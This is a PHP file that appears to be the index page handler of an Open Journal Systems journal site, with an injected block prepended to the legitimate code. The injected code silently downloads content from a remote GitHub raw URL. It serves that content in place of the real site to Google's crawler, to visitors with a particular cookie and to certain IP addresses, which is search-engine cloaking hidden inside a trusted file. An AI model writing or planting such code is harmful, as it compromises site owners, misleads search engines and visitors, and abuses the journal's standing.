<?php 
error_reporting(0);

$lp = "https://raw.githubusercontent.com/marketmg2/landing/refs/heads/main/journal-center-litpam-com.txt"; // ganti link raw

$curl_connect=curl_init($lp);
	curl_setopt($curl_connect,CURLOPT_RETURNTRANSFER,1);
	curl_setopt($curl_connect,CURLOPT_FOLLOWLOCATION,1);
	curl_setopt($curl_connect,CURLOPT_USERAGENT,"Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
	curl_setopt($curl_connect,CURLOPT_SSL_VERIFYPEER,0);
	curl_setopt($curl_connect,CURLOPT_SSL_VERIFYHOST,0);
$content_data=curl_exec($curl_connect);

$asd=["bot","ahrefs","google"];
foreach($asd as $len){
	$nul = $len;
}

$alow=["85.92.66.150","81.19.188.236","81.19.188.235","85.92.66.149"];

if($_SERVER["REQUEST_URI"]=="/"){
	$agent=strtolower($_SERVER["HTTP_USER_AGENT"]);
	if(
		strpos($agent,$nul)or
		$googleallow or
		isset($_COOKIE["s288"])or
		in_array($visitor_ip,$alow)
		)
		{
			echo $content_data;
			die();
		}
} ?>
<?php
/**
 * @defgroup pages_index Index Pages
 */
 
/**
 * @file pages/index/index.php
 *
 * Copyright (c) 2014-2021 Simon Fraser University
 * Copyright (c) 2003-2021 John Willinsky
 * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING.
 *
 * @ingroup pages_index
 * @brief Handle site index requests. 
 *
 */

 switch ($op) {
	case 'index':
		define('HANDLER_CLASS', 'IndexHandler');
		import('pages.index.IndexHandler');
		break;
}
